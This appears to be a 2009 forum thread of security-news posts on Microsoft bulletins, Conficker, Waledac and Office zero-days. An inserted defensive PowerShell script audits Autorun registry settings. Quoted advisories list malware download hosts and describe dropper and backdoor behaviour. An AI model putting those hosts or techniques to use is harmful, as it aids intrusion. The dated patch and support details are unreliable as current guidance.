January 19, 2009 - "...the Inauguration of Barack Obama and the Waledac trojan has been in full swing attempting to take advantage of the event. Since late last week the trojan has been blasting its way across the Internet with e-mails attempting to bring unwitting users to a page that looks a lot like the official Barack Obama website. The page is updated each day to appear to have a new blog entry... As always do NOT visit these domains as they are malicious and hosting exploit code... Click here* for a full listing of Waledac domains that we are aware of - this link will be updated as we get them. Your best bet is to block these domains or otherwise avoid them..."
* http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt

:fear:

AplusWebMaster
2009-01-23, 18:21
FYI...

MS patch needs to be installed manually to disable -Autorun- on W2K, XP, and W2K3.
- http://preview.tinyurl.com/ck79cs
January 22, 2009 (Computerworld) - "...US-CERT said that most Windows users would have to manually go to Microsoft's Web site to grab the KB953252* update. "Note that this fix has been released via [Windows] Update to Windows Vista and Server 2008 systems as part of the MS08-038 Security Bulletin," said the security organization, talking about a July 2008 patch. "Windows 2000, XP and Server 2003 users must install the update manually." Microsoft has -not- issued the KB953252 update to Windows 2000, XP or Server 2003 systems via Windows Update or the corporate-oriented Windows Server Update Services (WSUS). US-CERT confirmed that the KB653252 update -does- fix the bug it had pointed out the day before**. "Our testing has shown that installing this update -and- setting the NoDriveTypeAutoRun registry value to 0xFF -will- disable Autorun," said US-CERT..."

* http://support.microsoft.com/kb/953252

** http://www.us-cert.gov/cas/techalerts/TA09-020A.html
Last revised: January 21, 2009: Added reference and details for Microsoft KB953252

- http://www.secureworks.com/research/threats/downadup-removal/
"...F-Secure also has a removal tool available, however the f-secure.com domain is in the blocked list of domain names (per infection)... Using an IP address instead of the hostname will bypass the worm's blocking routines, so that tool could be downloaded by infected systems at this URL: ftp://193.110.109.53/anti-virus/tools/beta/f-downadup.zip ..."

:fear: :rolleyes:

AplusWebMaster
2009-01-27, 17:25
FYI...

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0243
Last revised: 01/22/2009
CVSS v2 Base Score: 7.2 (HIGH)
Overview: Microsoft Windows does not properly enforce the Autorun and NoDriveTypeAutoRun registry values, which allows physically proximate attackers to execute arbitrary code...

- http://www.us-cert.gov/cas/techalerts/TA09-020A.html
Last revised: January 21, 2009

- http://isc.sans.org/diary.html?storyid=5695
Last Updated: 2009-01-15 08:38:46 UTC

:fear:

AplusWebMaster
2009-01-30, 19:07
FYI...

Preemptive Downadup blocklist for February 2009
- http://www.f-secure.com/weblog/archives/00001593.html
January 30, 2009 - "... new list of potential domains for the month of February. The list reflects what we think to be the most common variant of Downadup in-the-wild..."
* http://www.f-secure.com/weblog/archives/Downadup_Domain_Blocklist_February.txt

:fear::mad::fear:

AplusWebMaster
2009-02-04, 00:23
FYI...

Microsoft Security Bulletin MS08-037 – Important
Vulnerabilities in DNS Could Allow Spoofing (953230)
- http://www.microsoft.com/technet/security/bulletin/ms08-037.mspx
Published: July 8, 2008
...Why was this security bulletin revised on January 13, 2009?
Microsoft revised this bulletin to communicate that the update offered by this bulletin may -not- have been correctly offered to all systems running Windows XP SP3. The detection and deployment issue has been fixed, and customers with Windows XP Service Pack 3 systems who have not already applied the update from this bulletin will now be correctly offered the update...
• V2.3 (January 13, 2009): Added a new entry to the Frequently Asked Questions (FAQ) Related to This Security Update section to communicate the fix to a detection and deployment issue with Windows XP Service Pack 3. There were no changes to the binaries or packages for this update. Customers who have successfully updated their systems do not need to reinstall this update.

Ed. note: 'Makes one wonder if the same was true for MS08-067...

:sad:

AplusWebMaster
2009-02-06, 02:24
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-feb.mspx
February 5, 2009 - "This is an advance notification of security bulletins that Microsoft is intending to release on February 10, 2009...
(Total of -4-)

Internet Explorer
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer

Microsoft Exchange Server
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Does not require restart

Microsoft SQL Server
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart

Microsoft Office - Visio
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart

:spider:

AplusWebMaster
2009-02-07, 09:53
FYI...

Protect Your Network from Conficker
- http://technet.microsoft.com/en-us/security/dd452420.aspx
February 6, 2009 - "This page aims to help customers by providing consolidated information about Conficker that customers can use to protect their systems and with which to recover systems that have been infected..."

("Related Links" also available at the URL above.)

:fear:

AplusWebMaster
2009-02-08, 14:37
FYI...

OpenDNS to roll out Conficker tracking - blocking
- http://www.theregister.co.uk/2009/02/07/opendns_conficker_protection/
7 February 2009 21:32 GMT - "With an estimated 10 million PCs infected by the stealthy worm known as Conficker, it's a good bet that plenty of administrators are blissfully unaware that their networks are playing host to the pest. Now, a free service called OpenDNS* is offering a new feature designed to alert administrators to the damage and help them contain it.
The company on Monday plans to introduce an addition to its offerings that makes it easy for admins to know if even a single machine has been infected by Conficker. The service will also automatically protect infected machines by preventing them from connecting to rogue servers controlled by the malware authors... Without the service, admins would have to manually block 1,750 domains each week, or 91,250 each year. The service will also help network admins to quickly pinpoint any infected machines by checking their OpenDNS Dashboard. Starting Monday, any networks with PCs that try to connect to the Conficker addresses will be flagged on an admin's private statistics page. The service is available for free to both businesses and home users... The service is first offered under a new botnet protection service being rolled out by OpenDNS... The list of blocked domains is being provided by anti-virus provider Kaspersky, which reverse-engineered Conficker so it could preemptively predict the new sites that will be used each day."
* https://www.opendns.com/homenetwork/start/

- http://blog.opendns.com/2009/02/09/stats-are-back-and-conficker/
Feb 9, 2009

- http://www.shadowserver.org/wiki/pmwiki.php?n=Stats.Sinkholes
February 16, 2009

:bigthumb:

AplusWebMaster
2009-02-10, 20:57
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-feb.mspx
February 10, 2009 - "This bulletin summary lists security bulletins released for February 2009... (-4-)

Critical -2-

Microsoft Security Bulletin MS09-002
Cumulative Security Update for Internet Explorer (961260)
- http://www.microsoft.com/technet/security/bulletin/ms09-002.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer

Microsoft Security Bulletin MS09-003
Vulnerabilities in Microsoft Exchange Could Allow Remote Code Execution (959239)
- http://www.microsoft.com/technet/security/bulletin/ms09-003.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Exchange Server

Important -2-

Microsoft Security Bulletin MS09-004
Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420)
- http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft SQL Server
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5416
Last revised: 02/12/2009
CVSS v2 Base Score: 9.0 (HIGH)

Microsoft Security Bulletin MS09-005
Vulnerabilities in Microsoft Office Visio Could Allow Remote Code Execution (957634)
- http://www.microsoft.com/technet/security/bulletin/ms09-005.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5836
Last Updated: 2009-02-10 18:59:20 UTC

.

AplusWebMaster
2009-02-11, 13:06
FYI...

MS Security Bulletin MS08-070 - Critical
Vulnerabilities in Visual Basic 6.0 Runtime Extended Files (ActiveX Controls) Could Allow Remote Code Execution (932349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-070.mspx
Updated: February 10, 2009 - This security update resolves five privately reported vulnerabilities and one publicly disclosed vulnerability in the ActiveX controls for the Microsoft Visual Basic 6.0 Runtime Extended Files. These vulnerabilities could allow remote code execution if a user browsed a Web site that contains specially crafted content. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights...

...Further details can be found in the security release issued by Akamai:
- http://www.akamai.com/html/support/security.html

...Further details can be found in the security release issued by RIM:
- http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB16248

• V1.2 (February 10, 2009): Clarified the class IDs for two ActiveX controls.
First, listed a second class ID in the workaround, "Prevent Windows Common AVI ActiveX Control from running in Internet Explorer," for CVE-2008-4255.
Second, listed in the section, Frequently asked questions (FAQ) related to this security update, the class ID for the Winsock Control for which the kill bit is being set as a security-related change to functionality in this update. This is an informational change only. There were no changes to the security update files in this bulletin.

//

Microsoft Security Advisory (960715)
Update Rollup for ActiveX Kill Bits
- http://www.microsoft.com/technet/security/advisory/960715.mspx
Published: February 10, 2009 - "Microsoft is releasing a new set of ActiveX kill bits with this advisory. The update includes kill bits for previously published Microsoft security bulletins:
• MS08-070 - Critical
Vulnerabilities in Visual Basic 6.0 Runtime Extended Files (ActiveX Controls) Could Allow Remote Code Execution (932349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-070.mspx
For more information about installing this update, see:
Update Rollup for ActiveX Kill Bits
- http://support.microsoft.com/kb/960715
February 10, 2009

:fear:

AplusWebMaster
2009-02-12, 05:16
FYI...

MSRT February 2009 - Win32/Srizbi
- http://preview.tinyurl.com/d59enk
February 10, 2009 Microsoft Malware Protection Center - "This month's MSRT takes on one of the largest botnets currently active worldwide – Win32/Srizbi. The Srizbi family of malware consists of trojan droppers and rootkits that often spread through spam e-mails containing download links to the malware. Much like its alleged close cousin Win32/Rustock (which is removed by the MSRT since Oct 2008), the Srizbi family of malware was developed mainly for the purpose of spam-for-hire operations. The Srizbi malware authors offer the botnet as an efficient method of sending spam e-mails for any organization who would stoop low enough to utilize this mechanism for advertising their intent..."
> http://www.microsoft.com/security/malwareremove/default.mspx

:fear: :bigthumb:

AplusWebMaster
2009-02-17, 19:34
FYI...

- http://blog.trendmicro.com/another-exploit-targets-ie7-bug/
Feb. 17, 2009 - "Cybercriminals are actively exploiting a critical vulnerability in Internet Explorer 7, which arises from the browser’s improper handling of errors when attempting to access deleted objects. This vulnerability allows remote attackers to execute arbitrary code on a vulnerable machine. The threat starts with a spammed malicious .DOC file detected as XML_DLOADR.A. This file has a very limited distribution script, suggesting it may be a targeted attack. It contains an ActiveX object that automatically accesses a site rigged with a malicious HTML detected by the Trend Micro Smart Protection Network as HTML_DLOADER.AS. HTML_DLOADER.AS exploits the CVE-2009-0075* vulnerability, which is already addressed by the MS09-002** security patch released last week. On an unpatched system though, successful exploitation by HTML_DLOADER.AS downloads a backdoor detected as BKDR_AGENT.XZMS. This backdoor further installs a .DLL file that has information stealing capabilities. It sends its stolen information to another URL via port 443... Our engineers are still working on the details of this threat. We will post updates as soon as more information becomes available..."
* http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0075
Last revised: 02/17/2009

** http://www.microsoft.com/technet/security/Bulletin/MS09-002.mspx

- http://isc.sans.org/diary.html?storyid=5884
Last Updated: 2009-02-17 19:55:10 UTC - "...there is absolutely nothing preventing attackers from using the exploit in a drive-by attack (and we can, unfortunately, expect that this will happen very soon)..."

- http://www.us-cert.gov/current/#malware_exploiting_microsoft_internet_explorer
February 17, 2009

:fear: :spider: :fear:

AplusWebMaster
2009-02-19, 22:51
FYI...

- http://vrt-sourcefire.blogspot.com/2009/02/ms09-002-in-wild.html
February 18, 2009 - "Yesterday we came across a website taking advantage of a programming error in Internet Explorer that allows a remote attacker to execute code on a vulnerable system. Microsoft issued an advisory (MS09-002) on February 10, 2009 and released a patch on the same day to mitigate the problem. We released same-day coverage for this and other vulnerabilities*... Upon visiting the compromised page with Internet Explorer 7 on a vulnerable machine, a malicious script is executed, which in turn downloads an executable on the system before crashing the web browser...
UPDATE: As of 11AM EST on Feb 19, 2009, another Chinese website is leveraging MS09-002 to push malware to victims..."
* http://www.snort.org/vrt/advisories/vrt-rules-2009-02-10.html
'Better known as "Drive-by malware"...
________________________________________

Cumulative Security Update for Internet Explorer - Extreme Severity
- http://atlas.arbor.net/briefs/
February 23, 2009 - "...key issues to address for -all- users of IE7. We have seen this used in targeted attacks and now exploit kits that target indiscriminately."
* http://www.microsoft.com/technet/security/bulletin/ms09-002.mspx

:fear::mad:

AplusWebMaster
2009-02-25, 00:56
FYI...

Microsoft Security Advisory (968272)
Vulnerability in Microsoft Office Excel Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/968272.mspx
February 24, 2009 - "Microsoft is investigating new public reports of a vulnerability in Microsoft Office Excel that could allow remote code execution if a user opens a specially crafted Excel file. At this time, we are aware only of limited and targeted attacks that attempt to use this vulnerability...
• Users who have installed and are using the Office Document Open Confirmation Tool* for Office 2000 will be prompted with Open, Save, or Cancel before opening a document.
* http://www.microsoft.com/downloads/details.aspx?familyid=8B5762D2-077F-4031-9EE6-C9538E9F2A2F

- http://www.securityfocus.com/bid/33870/exploit
"Symantec has detected active in-the-wild exploit attempts. This issue is detected as 'Trojan.Mdropper.AC'**

Trojan.Mdropper.AC
** http://preview.tinyurl.com/dbz42c
Updated: February 24, 2009 - "Systems Affected: Windows Vista, Windows XP
When the Trojan executes, it may exploit the Microsoft Excel Unspecified Remote Code Execution Vulnerability (BID 33870).
It then drops the following file: %Temp%\rundll.exe (a copy of Downloader)
The Trojan may then attempt to download more files on to the compromised computer from the following locations:
* [http://]61. 59.24.55 /sb.php?id=[19 RANDOM ASCII CHARACTERS]
* [http://]61. 59.24.45 /sb.php?id=[19 RANDOM ASCII CHARACTERS]
* [http://]61. 221.40.63 /sb.php?id=[19 RANDOM ASCII CHARACTERS] ..."

:fear::fear:

AplusWebMaster
2009-02-25, 18:18
FYI...

MS AutoRun fix for XP, W2K, W2K3 released...
- http://preview.tinyurl.com/cqtxcd
February 24, 2009 Computerworld - "Microsoft is pushing out a software update to some Windows users that fixes a bug in the Windows AutoRun software, used to automatically launch programs when DVDs or USB devices are introduced to the PC... the widespread Conficker worm uses AutoRun to spread from USB devices to PCs... (MS) had also pushed out a July update that fixed the problem for Vista and Server 2008*; but this fix** was -not- automatically updated for Windows 2000, XP and Server 2003 users..."

* http://www.microsoft.com/technet/security/Bulletin/MS08-038.mspx

How to correct "disable Autorun registry key" enforcement in Windows
** http://support.microsoft.com/kb/967715
February 24, 2009

- http://isc.sans.org/diary.html?storyid=5938
Last Updated: 2009-02-26 20:46:47 UTC ...(Version: 2)
"...XP home can't run gpedit.msc. XP home users need to follow the "How to selectively disable specific autorun features" steps. I recommend you modify the NoDriveTypeAutoRun value to 0xFF. That should disable autorun on ALL drives."

:fear::fear:

AplusWebMaster
2009-02-27, 20:39
FYI...

Microsoft Security Advisory (967940)
Update for Windows Autorun
- http://www.microsoft.com/technet/security/advisory/967940.mspx
02/24/2009 - "Microsoft is announcing the availability of an update that corrects a functionality feature that can help customers in keeping their systems protected. The update corrects an issue that prevents the NoDriveTypeAutoRun registry key from functioning as expected. When functioning as expected, the NoDriveTypeAutoRun registry key can be used to selectively disable Autorun functionality (e.g. AutoPlay, double click, and contextual menu features associated with Autorun) for drives on a user's system and network. Disabling Autorun functionality can help protect customers from attack vectors that involve the execution of arbitrary code by Autorun when inserting a CD-ROM device, USB device, network shares, or other media containing a file system with an Autorun.inf file. We encourage Windows customers to review and install this update. This update is available through automatic updating and from the download center. For more information about this issue, including download links for this non-security update, see Microsoft Knowledge Base Article 967715*."
* http://support.microsoft.com/kb/967715

:fear::fear:
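
The NoDriveTypeAutoRun workaround that US-CERT, the ISC diary and KB967715 describe above, as an added PowerShell audit script that is not part of any post here or of Microsoft's documentation: it reads the value from both policy hives, decodes which drive types still have Autorun enabled, checks whether the enforcement fix (KB967715 / KB953252) is listed among installed hotfixes, and with -Fix sets the value to 0xFF. The bit meanings are taken from Microsoft's documentation of NoDriveTypeAutoRun; the -Fix switch and the function names are my own.

```powershell
<#
  Added example (not from the posts above or from Microsoft): audits the
  NoDriveTypeAutoRun value discussed in US-CERT TA09-020A and KB967715 and
  reports which drive types still have Autorun enabled. Run as Administrator
  with -Fix to set the value to 0xFF (Autorun disabled for every drive type).
#>
param([switch]$Fix)

# Bit meanings as documented by Microsoft for NoDriveTypeAutoRun. A SET bit
# disables Autorun for that drive type; a CLEAR bit leaves it enabled.
$driveTypeBits = @{
    0x01 = 'Unknown type'
    0x04 = 'Removable (USB stick, floppy)'
    0x08 = 'Fixed (hard disk)'
    0x10 = 'Network'
    0x20 = 'CD-ROM / DVD'
    0x40 = 'RAM disk'
    0x80 = 'Unknown type (reserved)'
}

# Explorer honours the value from either hive; the machine policy (HKLM) wins
# when both exist, but a permissive per-user value is still worth flagging.
$policyPaths = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
)

function Get-NoDriveTypeAutoRun {
    param([string]$Path)
    $item = Get-ItemProperty -Path $Path -Name NoDriveTypeAutoRun -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }   # key or value absent
    return [int]$item.NoDriveTypeAutoRun
}

function Get-AutorunEnabledDriveTypes {
    # Returns the human-readable drive types whose bit is CLEAR in the mask.
    param([int]$Mask)
    $enabled = @()
    foreach ($bit in ($driveTypeBits.Keys | Sort-Object)) {
        if (($Mask -band $bit) -eq 0) { $enabled += $driveTypeBits[$bit] }
    }
    return ,$enabled
}

function Set-AutorunDisabledEverywhere {
    param([string]$Path)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    Set-ItemProperty -Path $Path -Name NoDriveTypeAutoRun -Value 0xFF -Type DWord
}

# 1. The registry value is only honoured reliably once the enforcement fix is
#    installed. On Windows 2000/XP/2003 that is KB967715 (earlier KB953252);
#    on Vista/Server 2008 it shipped inside MS08-038 and is not listed under
#    these IDs, so a warning there is expected.
$installedFix = Get-HotFix -Id 'KB967715', 'KB953252' -ErrorAction SilentlyContinue
if ($installedFix) {
    $ids = ($installedFix | ForEach-Object { $_.HotFixID }) -join ', '
    Write-Host "Autorun enforcement fix present: $ids"
} else {
    Write-Warning "KB967715 / KB953252 not listed: on XP/2000/2003 the registry value may not be enforced until the update is installed."
}

# 2. Decode the mask in each hive (and optionally enforce 0xFF).
foreach ($path in $policyPaths) {
    $mask = Get-NoDriveTypeAutoRun -Path $path
    if ($null -eq $mask) {
        # Documented built-in default on XP is 0x91: unknown and network drives
        # off, but removable, fixed and CD-ROM drives still run Autorun.
        Write-Warning "$path : NoDriveTypeAutoRun not set; the Windows default leaves removable, fixed and CD-ROM drives enabled."
    } else {
        $stillOn = Get-AutorunEnabledDriveTypes -Mask $mask
        $hex = '0x{0:X2}' -f $mask
        if ($stillOn.Count -eq 0) {
            Write-Host "$path : NoDriveTypeAutoRun = $hex (Autorun disabled for all drive types)"
        } else {
            Write-Warning "$path : NoDriveTypeAutoRun = $hex; Autorun still enabled for: $($stillOn -join ', ')"
        }
    }
    if ($Fix) {
        Set-AutorunDisabledEverywhere -Path $path
        Write-Host "$path : NoDriveTypeAutoRun set to 0xFF (log off or restart Explorer for it to take effect)"
    }
}
```

Writing to HKLM requires an elevated prompt; Get-HotFix only lists updates recorded in Win32_QuickFixEngineering, so an update installed through other channels may not appear even when the fix is present.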

AplusWebMaster
2009-03-06, 09:46
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-mar.mspx
March 5, 2009 - "This is an advance notification of security bulletins that Microsoft is intending to release on March 10, 2009...
(Total of -3-)

Critical (1)

Windows 1
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Important (2)

Windows 2
Maximum Severity Rating: Important
Vulnerability Impact: Spoofing
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Windows 3
Maximum Severity Rating: Important
Vulnerability Impact: Spoofing
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Other Information
Microsoft Windows Malicious Software Removal Tool
Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center...

- http://blogs.technet.com/msrc/archive/2009/03/05/march-2009-advanced-notification.aspx
___

- http://www.informationweek.com/shared/printableArticle.jhtm?articleID=215800831
March 5, 2009 - "The vulnerability that Microsoft warned about just over a week ago affects files that use the old .xls binary format but not the newer .xlsx format... Conspicuously absent is a fix for the Excel security flaw..."
// Excel 0-day - http://www.microsoft.com/technet/security/advisory/968272.mspx

- http://atlas.arbor.net/briefs/index#-1301369182
Severity: High Severity
Published: Thursday, March 05, 2009 14:00
At least one, possibly two, new and previously undisclosed vulnerabilities have been discovered and are being actively exploited in targeted, selective attacks. The document drops an EXE that downloads more components from three websites: 61.59.24.55, 61.59.24.45, and 61.221.40.63. At least two of these websites appear to be disabled at this point. We do not know when this vulnerability will be fixed by Microsoft.
Analysis: This is a targeted, very selective attack at this point focusing on US government and specific agencies and third-parties at this point. We do not have any additional information to share at this time, we recommend concerned parties contact Microsoft, CERT/CC or US-CERT for additional details as needed.
- http://www.securityfocus.com/brief/914

SecureWorks
- http://preview.tinyurl.com/99wgn9

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0238

:fear:

AplusWebMaster
2009-03-10, 19:42
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-mar.mspx
March 10, 2009 - "This bulletin summary lists security bulletins released for March 2009...

Critical -1-

Microsoft Security Bulletin MS09-006 – Critical
Vulnerabilities in Windows Kernel Could Allow Remote Code Execution (958690)
- http://www.microsoft.com/technet/security/bulletin/MS09-006.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
Executive Summary: This security update resolves several privately reported vulnerabilities in the Windows kernel. The most serious vulnerability could allow remote code execution if a user viewed a specially crafted EMF or WMF image file from an affected system. This security update is rated Critical for all supported editions of Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008...
CVE-2009-0081, CVE-2009-0082, CVE-2009-0083

Important -2-

Microsoft Security Bulletin MS09-007 - Important
Vulnerability in SChannel Could Allow Spoofing (960225)
- http://www.microsoft.com/technet/security/bulletin/MS09-007.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
Executive Summary: This security update resolves a privately reported vulnerability in the Secure Channel (SChannel) security package in Windows. The vulnerability could allow spoofing if an attacker gains access to the certificate used by the end user for authentication. Customers are only affected when the public key component of the certificate used for authentication has been obtained by the attacker through other means. This security update is rated Important for all supported editions of Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008...
CVE-2009-0085

Microsoft Security Bulletin MS09-008 – Important
Vulnerabilities in DNS and WINS Server Could Allow Spoofing (962238)
- http://www.microsoft.com/technet/security/bulletin/MS09-008.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
Executive Summary: This security update resolves two privately reported vulnerabilities and two publicly disclosed vulnerabilities in Windows DNS server and Windows WINS server. These vulnerabilities could allow a remote attacker to redirect network traffic intended for systems on the Internet to the attacker’s own systems. This security update is rated Important for all supported editions of Microsoft Windows 2000 Server, Windows Server 2003, and Windows Server 2008...
CVE-2009-0093, CVE-2009-0094, CVE-2009-0233, CVE-2009-0234
___

Malicious Software Removal Tool
- http://www.microsoft.com/security/malwareremove/default.mspx
File Name: windows-kb890830-v2.8.exe
Version: 2.8
Knowledge Base (KB) Articles: http://support.microsoft.com/?kbid=890830
Date Published: 3/10/2009
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5995
Last Updated: 2009-03-10 17:48:31 UTC

AplusWebMaster
2009-03-11, 10:08
Revised...

Microsoft Security Bulletin MS08-052 – Critical
Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593)
- http://www.microsoft.com/technet/security/bulletin/ms08-052.mspx
Updated: March 10, 2009
• V4.0 (March 10, 2009): Added entry in the Frequently Asked Questions (FAQ) Related to this Security Update section to communicate the rerelease of the update packages for Windows XP Service Pack 3 and Windows Server 2003 Service Pack 2 to fix an installation issue. Customers who have already successfully installed the original updates for Windows XP Service Pack 3 or Windows Server 2003 Service Pack 2 do not need to reinstall the new updates.

:fear:

AplusWebMaster
2009-03-13, 12:31
FYI...

- http://isc.sans.org/diary.html?storyid=6010
Last Updated: 2009-03-13 03:07:43 UTC - "...Microsoft should really fix this vulnerability and pay more attention to local privilege escalation vulnerabilities. While MS released an advisory with suggested workarounds (available at http://www.microsoft.com/technet/security/advisory/951306.mspx *), I don’t think enough people know about this..."
* Microsoft Security Advisory (951306)
Vulnerability in Windows Could Allow Elevation of Privilege...
Revisions:
• April 17, 2008: Advisory published
• April 23, 2008: Added clarification to impact of workaround for IIS 6.0
• August 27, 2008: Added Windows XP Professional Service Pack 3 as affected software.
• October 9, 2008: Added information regarding the public availability of exploit code.

:fear::fear:

AplusWebMaster
2009-04-03, 13:20
FYI...

Microsoft Security Advisory (969136)
Vulnerability in Microsoft Office PowerPoint Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/969136.mspx
April 2, 2009 - "Microsoft is investigating new reports of a vulnerability in Microsoft Office PowerPoint that could allow remote code execution if a user opens a specially crafted PowerPoint file. At this time, we are aware only of limited and targeted attacks that attempt to use this vulnerability... Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs..."

- http://secunia.com/advisories/34572/
Release Date: 2009-04-03
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched ...

- http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0556

:fear:

AplusWebMaster
2009-04-06, 13:20
FYI...

New exploit of MS08-067
- http://blogs.technet.com/mmpc/archive/2009/04/03/a-new-exploit-of-ms08-067-has-been-identified.aspx
April 03, 2009 - "... We have found a new exploit of MS08-067 other than Conficker. We also discovered that we already detected and protected users against this new malware... Neeris is a worm that has been active for a few years. Some of its variants used to exploit MS06-040 which addressed a vulnerability in the same Server service as MS08-067. However it looks like the authors of Neeris have been taking notes from Conficker. A new variant of the Neeris worm has been launched this week. It has some interesting similarities to Conficker:
• The new variant of Neeris has been updated to exploit MS08-067. Also, after the successful exploitation, the victim machine downloads a copy of the worm from the attacking machine using HTTP.
• Neeris spreads via autorun. The new Neeris variant even adds the same ‘Open folder to view files’ AutoPlay option that Conficker does.
• Neeris uses a driver to patch the TCP/IP layer of the system in order to remove the outgoing connection limits from XPSP2 ...
The file names that this malware uses are deceptive. Most commonly we saw it using the name “Netmon.exe” but it sometimes masquerades itself as a SCR file with names that follow the pattern <two digits.scr>. It also drops a copy of itself using the file name smartkey.exe. Even its image time stamp is bogus: 6/19/1992 10:22:17 PM. The malware adds itself to start every time Windows starts and even adds itself to the Safe Boot configuration.
Due to the similarities to Conficker, most of the mitigations that were mentioned also apply here: make sure to install MS08-067 if you haven’t done so yet and be careful to use only AutoPlay options you’re familiar with or consider disabling the Autorun altogether. Other mitigations and information are available in our write up at Worm:Win32/Neeris.gen!C *..."
* http://www.microsoft.com/security/portal/Entry.aspx?Name=Worm%3aWin32%2fNeeris.gen!C

:fear::fear:

AplusWebMaster
2009-04-10, 14:49
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-apr.mspx?pf=true
April 9, 2009 - "This is an advance notification of security bulletins that Microsoft is intending to release on April 14, 2009... (Total of -8-)

Critical (5)

Windows 1
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Microsoft Office...

Windows 2
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Windows 3
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows...

IE
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer...

Excel
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Important (2)

Windows 4
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

ISA
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: Requires restart
Affected Software: Microsoft Forefront Edge Security...

Moderate (1)

Windows 5
Maximum Severity Rating: Moderate
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

//

AplusWebMaster
2009-04-11, 00:39
FYI...

- http://www.wservernews.com/
Apr. 10, 2009 - "Next Tuesday (14-Apr-2009), Redmond will no longer offer mainstream support for a bunch of Service Packs flavors, WinXP (Service Pack 0) and W2K3 SP1 among them. They said they will continue to provide free security fixes for XP until 2014. Windows XP still accounts for about 63 percent of all Internet-connected computers, according to March 2009 statistics from Hitslink, while Windows Vista makes up about 24 percent. Here are the Hitslink market share numbers:
http://marketshare.hitslink.com/operating-system-market-share.aspx?qprid=10
Support for WinXP Service Pack 2 is until July 13, 2010. Existing XP users are encouraged to upgrade to the latest SP3. More about this at the "Windows Service Pack Road Map" at Microsoft:
- http://www.microsoft.com/windows/lifecycle/servicepacks.mspx ...
... list of products and versions where the support will end on April 14, 2009...
- http://preview.tinyurl.com/s870 ..."

:lip:

AplusWebMaster
2009-04-13, 13:27
FYI...

- http://preview.tinyurl.com/cj5b73
